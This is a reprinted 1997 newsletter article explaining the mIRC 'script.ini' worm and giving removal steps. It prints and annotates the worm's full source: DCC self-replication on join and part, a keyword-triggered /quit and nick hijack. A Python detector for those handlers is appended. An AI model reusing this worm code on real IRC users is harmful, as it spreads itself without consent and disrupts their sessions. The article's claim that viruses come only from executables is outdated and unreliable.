Tech Support...



The So-Called "Script Virus"
an explanation and "cure" from Bubba


Scenario 1:
      You just checked into your favorite channel. Suddenly, before you can even read the nickname list, a DCC window pops up from someone you know asking if you want to receive the file "script.ini." Do you click "YES" or click "NO?"

Scenario 2:
      For the last week, every time you check into a channel, people who join keep asking you what is that file that you sent them, or people joining the channel start insisting that you QUIT trying to send them that *%!@&* file!

      What is happening here? Why is someone trying to send you a file as soon as you join the channel? Why are people asking you to stop sending them something you never tried to send? It's the so-called "script virus" at work, trying to replicate itself. First of all, however, relax - THIS IS NO VIRUS! Nor is the "script virus" even dangerous. It is a nuisance, but it is harmless, and what's even better is that it is easy to get rid of.

     The "script virus" probably got its name because it tries to reproduce itself automatically like a virus. Unlike a virus, however, the "script virus" stops there and does no harm to your computer or anyone else's. True viruses are composed of binary code residing inside executable files (.exe, .com and MS Word Macros - which run inside of the MS macro generator, an executable program within MS Word itself). That is why you can get a virus ONLY from an executable file such as a .com, .exe or MS Word macro.

      What makes the script virus a nuisance is that it preys on less knowledgeable users, seeming to "hide" in their system, and seeking to propagate itself by DCC transfer to everyone who joins or leaves any channel, every time they join and leave! Often the "infected" person has no idea that s/he even has the thing running; and that same person often has even less idea of how to make it stop running. Not to worry- here you will find a simple process for disabling and removing the so-called "script virus."

Removing the so-called "script virus:"

This "virus" is actually nothing more than an ".ini" file residing in the mIRC directory along with aliases.ini, events.ini, etc. It is called "script.ini" and removing it will end your problem. The removal is a two-step process:

1) ERASE the script.ini file from the mIRC directory altogether or simply MOVE (not copy) it to another directory.
In Windows 95: RIGHT CLICK on the "Start" button and choose "Explore." In "Explore" navigate to the mIRC directory (usually C:\mirc) and highlight it. Find the file named "script.ini" and delete it by dragging it to the "Recycle Bin" and dropping it there, or by RIGHT CLICKING on it and choosing "Delete." In addition to erasing the script.ini file, you must unload the script before you are rid of it.
2) UNLOAD the script.ini from mIRC using the /unload command.
In any window type the command: /unload -rs script.ini <enter>. Be sure the forward slash comes before the command; the -rs is required. You should see a notice that script.ini has been unloaded. You must unload the script as well as erase it to be rid of it. If you fail to do either one of the two steps, you will "reinfect" yourself and continue to have a problem.
      Once you have erased the script.ini file AND unloaded script.ini, exit mIRC and restart it; you will be cured of the nuisance of the "script virus."

A FINAL NOTE: The so-called "script virus" can only spread maliciously to those who receive DCC transfers into their mIRC directory. If you change the directory into which downloads are saved to something other than the mIRC directory, you will not have this or related problems again. As a matter of principle, you should NEVER receive DCC transfers directly into your mIRC directory.

How the so-called "script virus" works:

      The so-called "script virus" is actually no "virus" at all but an ".ini" file functioning within mIRC, much like aliases.ini, events.ini, etc. function. When mIRC starts up, it looks for several ".ini" files which it loads without having to be told to do so, and one of the files mIRC looks for and loads if present is "script.ini." Whatever is in the "script.ini" file is then available for mIRC to use, just like your aliases, various automatic greets and so on.

      The content of the "script.ini" file functions similarly to an autogreet, offering to send itself as a DCC transfer to everyone who joins the channel. The hope of the initiator of the "virus" is that users will "auto accept" this transfer straight into their mIRC directories. When this happens, the next time the "infected" user starts up mIRC the script will load (invisibly as far as the user is concerned) and will try to send itself to everyone joining or leaving the channel on which the infected user is operating.

      If you do not have "auto accept" turned on you have a chance to refuse "script.ini" when someone tries to send it to you. If you do not receive DCC transfers directly into your mIRC directory, then even if you do accept "script.ini" you are not in danger since mIRC will not automatically load a script by that name from any other directory. Thus, two normal procedures (or procedures that should be normal) are actually adequate protection against this or any other nuisance - such as someone sending you an empty aliases.ini that automatically "replaces" the one you worked so hard to build.

For the really curious, the complete script contents are listed below and examined in detail:

[script]
ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
/dcc send $nick $mircdirscript.ini
}
This is the "meat" of the script. After the obligatory beginning, [script], the "trigger" ON JOIN command detects a new person joining the channel. Then "{/if ($nick == $me)..." keeps the script from trying to DCC to itself. Finally, if the joining person is someone other than the "infected" user ($me) then the DCC transfer of the file named "script.ini" from the "infected" user's mIRC directory is automatically started.
ON 1:PART:#:{ /if ( $nick == $me ) { halt }
/dcc send $nick $mircdirscript.ini
}
Notice the similarity between this and the "ON JOIN" statement above. This section repeats the offer to DCC transfer "script.ini" whenever anyone leaves the channel - really annoying.
Now comes the malicious part:

ON 1:TEXT:*ouch*:#:/quit iNFeCTeD!
This triggers when a certain text "string" is seen by mIRC, in this case any word with the letters "ouch" in it. That means it would trigger with "couch," "touch," "grouchy," "pouches," etc. When that string is seen by mIRC, the "infected" user's mIRC shuts itself down (/quit) and sends the message "iNFeCTeD" to the channel window for the other users to see.
ON 1:TEXT:*XX!XX*:*:/msg $nick i'm iNFeCTeD!
This "TEXT" trigger lets someone see if you are using the script.ini malicious file. If I wanted to check you, for example, I would type XX!XX in the channel window, and your mIRC would respond to me in a "message" window saying "i'm iNFeCTeD." I could then use that message window to harass you, or could type "ouch" in the channel window and cause you to shut down. Warning: DO NOT send this in #50+retired to "test" if anyone is "infected."
ON 1:TEXT:*ananas*:#:{
/nick _XInFected
%i = 0
%opit = $opnick(0,$chan)
:looppi
%i = %i + 1
/if ($opnick(%i,$chan) != $me ) { %line = $opnick(%i,$chan) }
/i
I'm not sure that this command would actually work, or how, but what is clear here is that the script is intended to change the "infected" user's nick to "_XInFected" when it sees the text string "ananas." So, for example, I could enter the channel and say, "Your DCC stuff is driving me bananas!" and anyone infected would see their nick change suddenly.

The rest of the script is designed to deal with nick changes for several infected people on a channel, since they can't all have the nick "_XInFected." The script looks over nick changes as they are made, and puts numbers in front of nicks as necessary so that no two are the same, resulting in "_XInFected," "_1InFected," "_2InFected" and so on.
--- end of explanation ---
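
As an added example (not part of the original newsletter article), here is a small Python check that reads the text of a script.ini and flags the three behaviours examined above: JOIN/PART handlers that DCC-send script.ini, TEXT handlers that run /quit or /nick on a keyword, and handlers carrying the "iNFeCTeD" reply text. The sample is constructed from the handlers quoted in the article; the reason labels and the handling of an "n0=" line prefix are assumptions of this example.

```python
import re

# Constructed sample: the handlers quoted in the article (the "ananas" one cut
# to its first command) plus one harmless handler for contrast.
SAMPLE = r"""[script]
ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
/dcc send $nick $mircdirscript.ini
}
ON 1:PART:#:{ /if ( $nick == $me ) { halt }
/dcc send $nick $mircdirscript.ini
}
ON 1:TEXT:*ouch*:#:/quit iNFeCTeD!
ON 1:TEXT:*XX!XX*:*:/msg $nick i'm iNFeCTeD!
ON 1:TEXT:*ananas*:#:{
/nick _XInFected
}
ON 1:TEXT:!time:#:/msg $chan $time
"""

# Assumption: a saved file may prefix each line with "n0=", "n1=", ...
EVENT = re.compile(r"^\s*(?:n\d+=)?\s*ON\s+\d+:(\w+):", re.I)
SELF_SEND = re.compile(r"dcc\s+send\s+\S+\s+\S*script\.ini", re.I)
REMOTE_CMD = re.compile(r"/(quit|nick)\b", re.I)
MARKER = re.compile(r"infected", re.I)

def scan(text):
    """Return (handler_start_line, event, reason) for each suspicious line."""
    findings, current = [], None
    for no, line in enumerate(text.splitlines(), 1):
        m = EVENT.match(line)
        if m:                                  # a new ON handler begins here
            current = (no, m.group(1).upper())
        if current is None:
            continue
        start, event = current
        if event in ("JOIN", "PART") and SELF_SEND.search(line):
            findings.append((start, event, "self-send"))       # replication
        elif event == "TEXT" and REMOTE_CMD.search(line):
            findings.append((start, event, "remote-command"))  # /quit or /nick on a keyword
        elif event == "TEXT" and MARKER.search(line):
            findings.append((start, event, "marker"))          # reply to the XX!XX probe
    return findings

if __name__ == "__main__":
    for start, event, reason in scan(SAMPLE):
        print(f"line {start}: ON {event} handler -> {reason}")
```

These are heuristics: a legitimate script may also use /nick in a TEXT handler, so a finding is a reason to read the handler, not proof of "infection."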

      So much for the (lame) attempt to wreck IRC with the so-called "script virus." Knowledge is not only power, but a pretty good defense. If you have the "infection," remove it as explained above. To prevent "infection," take the precautions listed above. May your holiday be free of "infection," and your new year's resolutions include TURNING OFF "auto accept" and making a special directory to receive DCC transferred files.

See you on the channel!

            Bubba


Reprinted from the December 1997 edition of the 50+retired Newsletter. Copyright 1997, Arch C. Baker, all rights reserved.